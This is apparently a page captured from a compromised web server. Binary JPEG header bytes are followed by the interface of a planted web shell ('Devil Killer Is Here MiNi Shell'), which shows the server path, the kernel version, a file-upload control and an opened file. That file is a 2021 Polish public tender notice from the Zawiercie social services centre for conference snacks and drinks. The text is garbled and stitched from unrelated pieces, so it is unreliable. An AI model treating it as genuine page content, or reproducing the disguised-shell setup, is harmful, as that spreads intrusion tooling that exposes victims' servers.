JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210525/0006398701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00063987 z dnia 2021-05-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa suszu konferencyjnego w ramach realiz. projektu 9.1.1. „Wzmacnianie<br/>potencjału społeczno – zaw.” na lata 2020-2022 II Etap współfina. ze środków EFS. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Społecznej w Zawierciu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003462043</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piłsudskiego 47</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zawiercie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">032 672 21 34</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mops@mopszawiercie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mopszawiercie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa suszu konferencyjnego w ramach realiz. projektu 9.1.1. „Wzmacnianie<br/>potencjału społeczno – zaw.” na lata 2020-2022 II Etap współfina. ze środków EFS. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b9675edd-bcd4-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00063987</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004330/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 dostawa suszu konferencyjnego w ramach projektu "Wzmacnianie potencjału społeczno-zawodowego" na lata 2020-2022 - II etapie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie współfinansowane ze środków Unii Europejskiej w ramach RPO WSL na lata 2014- 2020 (Europejski Fundusz Społeczny) w ramach realizowanego projektu 9.1.1. „Wzmacnianie potencjału społeczno – zawodowego” na lata 2020-2022 II Etap. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mops-zawiercie.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mopszawiercie.<br/>logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany jest<br/>zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem<br/>https://mops-zawiercie.logintrade.net/rejestracja/ustawowe.htmloraz zaakceptować regulamin<br/>korzystania z Platformy przetargowej dostępny pod adresem: https://mopszawiercie.<br/>logintrade.net/rejestracja/ustawowe.html2. Złożenie oferty poprzez Platformę przetargową<br/>oznacza akceptację regulaminu, o którym mowa w ust. 1 niniejszego rozdziału SWZ.3. Wymagania<br/>techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie internetowej<br/>Platformy przetargowej - pod adresem:https://mopszawiercie.<br/>logintrade.net/rejestracja/ustawowe.html4. Wsparcia technicznego w zakresie działania<br/>Platformy przetargowej udziela jej dostawca, tj. Logintrade SA ul. Legnicka 57D, lokal B/J, 54-203<br/>Wrocław, nr tel. 71 787 35 34, e-mail: helpdesk@logintrade.net od poniedziałku do piątku (dni robocze)<br/>w godz. 800 - 1600.5. Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz<br/>potwierdzenia złożenia oferty (w zależności od wyboru opcji z logowaniem lub bez logowania), zostały<br/>opisane w Instrukcjach użytkowników Platformy przetargowej.6. Oferty, oświadczenia, o których mowa<br/>w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art.<br/>117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118<br/>ust. 3 ustawy, zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki<br/>dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych<br/>w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne (Dz.U. z 2020 r. poz. 346, 568, 695, 1517 i<br/>2320), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.Pozostałe wymagania zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1 z późn. zm.), dalej „RODO”, informuję, że: administratorem Pani/Pana danych<br/>osobowych jest: Dyrektor Miejskiego Ośrodka Pomocy Społecznej w Zawierciu, z siedzibą w Zawierciu,<br/>42-400 Zawiercie, ul. Piłsudskiego 47; Administrator wyznaczył Inspektora Ochrony Danych, z którym<br/>może się Pani/Pan skontaktować w sprawach związanych z ochroną danych osobowych w<br/>następujący sposób:- pod adresem poczty elektronicznej: iodo@mopszawiercie.pl;- pisemnie na adres<br/>siedziby Administratora; Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: Sukcesywna<br/>dostawa suszu konferencyjnego w ramach realizowanego projektu 9.1.1. „Wzmacnianie potencjału<br/>społeczno – zawodowego” na lata 2020-2022 II Etap współfinansowanego ze środków Europejskiego<br/>Funduszu Społecznego. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z<br/>dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2019 r. poz. 2019 z późn.zm.), dalej<br/>„ustawa Pzp”; Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie<br/>przede wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji<br/>kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów<br/>zakładowych, chyba że przepisy szczególne stanowią inaczej; obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp; w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO; posiada Pani/Pan:• na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących;• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych(1);• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych (2);• prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO; nie przysługuje Pani/Panu:• w związku z art. 17 ust. 3 lit. b, d lub e RODO<br/>prawo do usunięcia danych osobowych;• prawo do przenoszenia danych osobowych, o którym mowa w<br/>art. 20 RODO;• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO.(1) wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować<br/>zmianą wyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.(2) wyjaśnienie: zgodnie z art. 19<br/>ust. 3 ustawy Pzp wystąpienie z zadaniem o którym mowa w art. 18 ust.1 rozporządzenia 2016/679,<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia postepowania o udzielenie<br/>zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PN/2/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywna dostawa suszu konferencyjnego na koszt i ryzyko<br/>Wykonawcy do Miejskiego Ośrodka Pomocy Społecznej w Zawierciu, ul. Niedziałkowskiego 22,<br/>obejmującego następujący asortyment:a/ Ciastka MIX (Pierniki w czekoladzie z nadzieniem -<br/>skład: czekolada min.28%, cukier, miazga kakaowa, tłuszcz kakaowy, tłuszcz roślinny palmowy;<br/>Herbatniki mieszanka z nadzieniem, z masą - skład: cukier, tłuszcz roślinny, polewa kakaowa,<br/>kakao o obniżonej zawartości tłuszczu, orzechy arachidowe, kakao, mleko odtłuszczone w<br/>proszku, olej roślinny; Ciastka typu biszkopty z galaretką owocową oblewane czekoladą; Ciastka<br/>typu markizy – herbatniki z kremem kakaowym lub orzechowym lub waniliowym lub chałwowym;<br/>Ciastka kokosowe - skład: cukier, olej palmowy, wiórki kokosowe (min.15%); Ciastka kruche z<br/>cukrem - skład: cukier, mąka pszenna, tłuszcz roślinny palmowy; Rurki z nadzieniem - skład:<br/>cukier, tłuszcz palmowy, odtłuszczone mleko w proszku, kakao o obniżonej zawartości tłuszczu,<br/>Andruty, wafel – opłatek, bez konserwantów - skład: mąka pszenna, woda, cukier, olej<br/>rzepakowy;b/ kawa rozpuszczalna 100% naturalna, 200g – w ilości 44 sztuk;c/ kawa naturalna<br/>mielona, 100% arabica, 250g – w ilości 40 sztuk;d/ herbata czarna ekspresowa op.100 x 2g – w<br/>ilości 21 opakowań;e/ herbata owocowa ekspresowa, 50g, różne smaki – w ilości 99<br/>opakowań;f/ paluszki słone duże opakowanie 320g (+/- 5%) – w ilości 112 opakowań;g/ paluszki<br/>z sezamem duże opakowanie 320g (+/- 5%) – w ilości 112 opakowań;h/ cukier biały 1kg – w<br/>ilości 12kg;i/ cukier trzcinowy 1kg – w ilości 5kg;j/ śmietanka w płynie do kawy, op. 10szt/10g – w<br/>ilości 156 opakowań;k/ woda niegazowana o pojemności 0,5l – w ilości 2700 sztuk;l/ woda<br/>gazowana o pojemności 0,5l – w ilości 1300 sztuk;ł/ sok owocowy, 300ml, 100% pasteryzowany,<br/>nie zawierający dodatków smakowych, zapachowych , konserwantów, bez dodatku cukru – w<br/>ilości 1350 sztuk;m/ kubek jednorazowy do zimnych napojów o pojemności 200ml (1op=100szt)<br/>– w ilości 36 opakowańn/ kubek jednorazowy do ciepłych napojów o pojemności 200ml<br/>(1op=100szt) – w ilości 36 opakowań;o/ łyżeczki jednorazowe małe (1op = 100szt) – w ilości 36<br/>opakowań;p/ mieszanka suszonych owoców (żurawina, jagody, rodzynki, śliwki, 250g – w ilości<br/>8 kg;r/ batonik śniadaniowy/ zbożowy z ziarnami/suszonymi owocami 40g – w ilości 8 kg.2.<br/>Dostarczone produkty muszą być odpowiednio oznakowane, tj. opatrzone etykietą z opisem Dostarczone produkty muszą być odpowiednio oznakowane, tj. opatrzone etykietą z opisem<br/>produktu, numerem partii, wagą, terminem przydatności do spożycia. 3. Dostawy będą<br/>realizowane sukcesywnie w ilościach, terminie i według wskazań określonych przez<br/>Zamawiającego, stosownie do zaistniałych potrzeb począwszy od dnia zawarcia umowy. 4.<br/>Zamówienie każdej dostawy będzie się odbywało telefonicznie lub drogą elektroniczną z<br/>jednodniowym wyprzedzeniem w godz. 7.00-15.00 średnio 1 raz na dwa miesiące.5.<br/>Wykonawca będzie realizował dostawy towarów na własny koszt do siedziby Zamawiającego w<br/>godzinach pracy Zamawiającego.6. Termin przydatności do spożycia artykułów spożywczych od<br/>chwili dostarczenia produktu do Zamawiającego nie może być krótszy niż ¾ okresu, w którym<br/>produkt zachowuje zdatność do spożycia określoną na etykiecie. W przypadku dostawy<br/>przedmiotu zamówienia z krótszą datą ważności niż wyżej wymieniona, Zamawiający ma prawo<br/>zwrotu przedmiotu zamówienia przed upływem terminu jego ważności. 7. Reklamacje z tytułu jakości, ilości dostawy towaru będą zgłaszane przez Zamawiającego w dniu, w którym<br/>dostarczono wadliwy towar. Wykonawca zobowiązuje się do wymiany wadliwego towaru na<br/>towary wolne od wad i spełniające wymagania jakościowe, na koszt własny. Zamawiający może<br/>zwrócić całą partię towarów Wykonawcy odmawiając jednocześnie zapłaty.8. Wykonawca<br/>będzie realizował zamówienia do Zamawiającego środkami transportu dostosowanymi do<br/>przewozu żywności, zgodnie z odpowiednimi wymogami sanitarnymi, w sposób zapobiegającym<br/>utracie walorów smakowych i odżywczych, w opakowaniach Wykonawcy, za które on nie będzie<br/>pobierał opłat, a Zamawiający zobowiązany będzie do ich zwrotu. 9. Dostawa nastąpi na koszt i<br/>ryzyko Wykonawcy. Środek transportu musi być przystosowany do przewożenia tego typu<br/>towaru zgodnie z obowiązującymi przepisami sanitarnymi, w sposób zapobiegający utracie<br/>walorów smakowych i odżywczych.10. Środek transportu winien być przystosowany do<br/>przewozu artykułów spożywczych, w warunkach zapewniających utrzymanie właściwej ich<br/>jakości.11. Wykonawca zobowiązany jest do wniesienia towaru do pomieszczeń wskazanych<br/>przez Zamawiającego. Dostawa, rozładunek i wniesienie realizowane będą na koszt dostawy<br/>wkalkulowany w cenę dostarczanych produktów. 12. Zamawiający dopuszcza zaoferowanie<br/>produktów równoważnych lub zaoferowanie rozwiązań równoważnych, z zachowaniem<br/>podanych w opisie wymagań minimalnych dla danego produktu. Gramatura oferowanego<br/>produktu równoważnego nie może być niższa niż gramatura produktu wskazanego przez<br/>Zamawiającego. Zaoferowany produkt musi posiadać co najmniej takie same walory<br/>organoleptyczne (smak, zapach, barwa, estetyka, konsystencja) oraz zawierać w swoim składzie<br/>co najmniej te same surowce użyte do produkcji, co produkt określony przez Zamawiającego i<br/>nie obniżą określonych przez Zamawiającego standardów.. Wykonawca oferując produkt<br/>równoważny musi jednocześnie zaznaczyć w ofercie jakiego produktu dotyczy oferta<br/>równoważna – co proponuje Wykonawca jako produkt równoważny. Ponadto produkt należy<br/>opisać w taki sposób, aby potwierdzić, że spełnia wymogi Zamawiającego i załączyć do oferty<br/>dokumenty potwierdzające, że zastosowane rozwiązania równoważne spełniają wymogi<br/>Zamawiającego. 13. Wielkości zamówienia podane w Załączniku nr 1 a do SIWZ – w formularzu<br/>asortymentowo -cenowym są wielkościami szacunkowymi, jakie Zamawiający planuje zakupić w<br/>okresie obowiązywania umowy. Zamawiający dopuszcza możliwość zmian ilości<br/>poszczególnych pozycji asortymentu z zastrzeżeniem dokonywania przez Zamawiającego<br/>zakupów do maksymalnej kwoty łącznej określonej w umowie. Z tytułu zmniejszenia kwoty<br/>wynagrodzenia Wykonawcy nie przysługuje żadne roszczenie finansowe. Zamawiający<br/>informuje, że wynagrodzenie wyniesie nie mniej niż 70% ceny podanej w formularzu oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z wymaganiami w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium środowiskowe – normy emisji spalin pojazdów, którymi będzie dostarczany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium społeczne – dostarczenie kawy pochodzącej z produkcji spełniającej standardy społeczne Sprawiedliwego Handlu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <p class="mb-0">wymagania dotyczące określonej etykiety, zgodnie z art. 104 ustawy - etykiety społecznej</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający nie stawia wymogu złożenia wraz z ofertą przedmiotowych środków<br/>dowodowych. 2. W przypadku zastosowania wyrobów lub rozwiązań równoważnych,<br/>Wykonawca zobowiązany jest do 